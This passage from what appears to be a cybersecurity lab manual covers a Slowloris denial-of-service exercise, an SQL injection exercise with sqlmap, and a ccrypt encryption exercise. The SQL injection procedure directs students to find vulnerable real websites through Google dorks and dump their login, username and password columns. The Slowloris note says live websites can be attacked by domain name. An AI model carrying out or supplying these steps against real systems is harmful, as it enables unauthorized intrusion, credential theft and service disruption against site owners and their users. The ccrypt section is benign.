Step3: Now go to the Action bar and click on split terminal vertically then we will see that
the two-terminal screen has been open now.
Step4: Now we have to check the IP address of our kali machine to do that type of following
command in the right-side terminal.

ifconfig

Step5: Now it’s time to start the apache server. Start the apache server using the following
command in the right-side terminal.

service apache2 start

Step6: Now we have to check the status of our server whether it is active or not so to check
the status of our server run the following command in the right-side terminal.

service apache2 status

Step7: We can see that our server is under active status it means it is running properly and to
check permissions run the following commands in the left-side terminal.

cd slowloris

ls -l

Step8: Now it’s time to run the tool using the following command in the left-side terminal.
python3 slowloris.py <our IP address> -s 500

Step9: We can see the tool has started attacking that particular IP address which we have
given now to check whether its working or not go to any browser and on the URL bar type
that IP address, and we will see the “ Problem loading page ” this is how Slowloris tool
works.

Note: As we can see here the browser is waiting for an IP address because the browser is not
able to load the page, this is because the denial-of-service attack is happening behind the
browser using slowloris tool if we want to attack the live website we can attack using the
domain name of that website instead of giving the IP address of the system to the slowloris
tool. Slowloris tool will start attacking that particular domain however it’s a crime, and we do
not promote such type of activity the experiment was only for education purposes.

Viva Questions:

1. What is Slowloris tool?

2. From where we clone the slowloris tool?

3. What are the uses of slowloris tool?

 Experiment No. 11
Aim: Perform SQL injection attack using the SQLmap tool.

Lab Objectives: The objective of this lab is to help students learn how to perform a SQL
injection and extract databases.

Lab Requirements: Kali Linux and Any browser.

Theory: SQL injection (SQLi) is a cyberattack that injects malicious SQL code into an
application, allowing the attacker to view or modify a database. SQL injection attacks can
have a significant negative impact on an organization. When a malicious user successfully
completes an SQL injection attack, it can have any of the following impacts:

 Exposes sensitive company data: Using SQL injection, attackers can retrieve and
alter data, which risks exposing sensitive company data stored on the SQL server.
 Compromise users’ privacy: Depending on the data stored on the SQL server, an
attack can expose private user data, such as credit card numbers.
 Give an attacker administrative access to our system: If a database user has
administrative privileges, an attacker can gain access to the system using malicious
code. To protect against this kind of vulnerability, create a database user with the least
possible privileges.
 Give an attacker general access to our system: If we use weak SQL commands to
check user names and passwords, an attacker could gain access to our system without
knowing a user’s credentials. With general access to our system, an attacker can cause
additional damage accessing and manipulating sensitive information.
 Compromise the integrity of our data: Using SQL injection, attackers can make
changes to or delete information from our system.

SQL injection attacks are fall into three categories: In-band SQL injection, Inferential SQL
injection and Out-of-band SQL injection.

1. In-band (Classic) SQL Injection:

In-band SQL injection is the most common type of attack. With this type of SQL injection
attack, a malicious user uses the same communication channel for the attack and to gather
results. The following techniques are the most common types of in-band SQL injection
attacks:
  Error-based SQL injection: With this technique, attackers gain information about
the database structure when they use a SQL command to generate an error message
from the database server. Error messages are useful when developing a web
application or web page, but they can be a vulnerability later because they expose
information about the database. To prevent this vulnerability, we can disable error
messages after a website or application is live.
 Union-based SQL injection: With this technique, attackers use the UNION SQL
operator to combine multiple select statements and return a single HTTP response. An
attacker can use this technique to extract information from the database. This
technique is the most common type of SQL injection and requires more security
measures to combat than error-based SQL injection.

2. Inferential (Blind) SQL Injection:

Inferential SQL injection is also called blind SQL injection because the website database
doesn’t transfer data to the attacker like with in-band SQL injection. Instead, a malicious user
can learn about the structure of the server by sending data payloads and observing the
response. Inferential SQL injection attacks are less common than in-band SQL injection
attacks because they can take longer to complete. The two types of inferential SQL injection
attacks use the following techniques:

 Boolean injection: With this technique, attackers send a SQL query to the database
and observe the result. Attackers can infer if a result is true or false based on whether
the information in the HTTP response was modified.
 Time-based injection: With this technique, attackers send a SQL query to the
database, making the database wait a specific number of seconds before responding.
Attackers can determine if the result is true or false based on the number of seconds
that elapses before a response. For example, a hacker could use a SQL query that
commands a delay if the first letter of the first database’s name is A. Then, if the
response is delayed, the attacker knows the query is true.

3. Out-of-Band SQL Injection:

Out-of-band SQL injection is the least common type of attack. With this type of SQL
injection attack, malicious users use a different communication channel for the attack than
they use to gather results. Attackers use this method if a server is too slow or unstable to use
inferential SQL injection or in-band SQL injection.

Procedure:

Step1: Open the Terminal and move to root user using the following command.

sudo su (enter password as kali)

Step2: Open any browser and search for vulnerable websites using the following dork.

inurl:“php?id=your target area” or inurl:“material.php?id=”

Step3: In the terminal window type sqlmap -u URL --dbs and hit enter button. This query
will retrieve the databases information. ( Note: Select http site only)
Step4: Now, we need to choose a database and retrieve the tables in the database. Type
sqlmap -u URL DBName --tables (or) sqlmap -u URL -D DBName --tables and hit enter
button. ( Wait for the results).

Step5: Now, we need to retrieve the columns associated with the tables. Type sqlmap -u
URL -D DBName -T TableName --columns and hit enter button.
Step6: To get the information related to any column type sqlmap -u URL -D DBName -T
TableName -C ColumnName –dump and hit enter. In this experiment we will retrieve
information from u_login, u_name and u_password columns.
Viva Questions:

1. What is SQL injection (SQLi)?

2. What is In-band SQL Injection?

3. What is another name of In-band SQL Injection?

4. What are the types of In-band SQL Injection?

5. What are the types of Inferential (Blind) SQL Injection?

6. What is Out-of-Band SQL Injection?

 Experiment No. 12
Aim: Practice encryption and decryption of text files using the Ccrypt tool.

Lab Objectives: The main objective of this lab is to know how to encrypt and decrypt text
files.

Lab Requirements: Kali Linux and Ccrypt tool.

Theory: Ccrypt is a command line tool for encryption and decryption of data. Ccrypt is based
on the Rijndael cipher, the same cipher used in the AES standard. On the other hand, in the
AES standard, a 128-bit block size is used, whereas ccrypt uses a 256-bit block size. Ccrypt
commonly uses the .cpt file extension for encrypted files.

 It is a lightweight tool; the installation and use of this tool is pretty easy.
 It is designed to overcome the shortcomings of standard Unix crypt utility.

Download link: https://ccrypt.sourceforge.net/download/1.11/ccrypt-1.11.linux-x86_64.tar.gz

Ccrypt Manual:

 -e, –encrypt: Encrypt. This is the default mode. If filename arguments are given,
encrypt the files and append the suffix .cpt to their names. Otherwise, run as a filter.
 -d, –decrypt: Decrypt. If filename arguments are given, decrypt the files and strip the
suffix .cpt from the filenames, if present. Otherwise, run as a filter.
 -c, –cat: Decrypt one or more files to standard output. If no filename arguments are
given, decrypt as a filter. Implies -l.
 -x, –keychange: Change the key of encrypted data. In this mode, ccrypt prompts for
two passwords: the old one and the new one. If filename arguments are given, modify
the files. Otherwise, run as a filter.
 -u, –unixcrypt: Simulate the old Unix crypt command. Note: the cipher used by Unix
crypt has been broken and is not secure. Please use this option only to decrypt existing
files. If filename arguments are given, decrypt the files to stdout. Otherwise, run as a
filter. Note that for the Unix crypt format, there is no easy way to detect whether a
given key matches or not; thus, for safety, this mode does not overwrite files.

Procedure:

Step1: Open the Terminal window in the Kali Linux and install ccrypt tool.
sudo apt-get install ccrypt

Note: If needed update the Kali Linux packages (sudo apt-get update).

Step2: Now check the modes inside the ccrypt tool.

ccrypt -h

Step3: Now create a text file, enter some text and read it.

nano practice.txt ( ctrl+s to save the file and ctrl+x to exit from the editor)

cat practice.txt

Step4: To encrypt the text file, we need to enter the following command. Enter the
encryption key for two times.
ccrypt -e filename.txt

Note: It will create a .cpt file

Step5: Now try to read the file. It will show the unusual text, that means encryption is
successful.

cat practice.txt.cpt

Step6: To decrypt the file, we need to enter the following command. Enter the decryption
key (encryption and decryption both keys are same).

Step7: Now try to read the text file again, it will show the text. It means decryption is
successful.

Viva Questions:

1. What is encryption?

2. What is decryption?

3. What is the full form of AES?

4. What is cipher?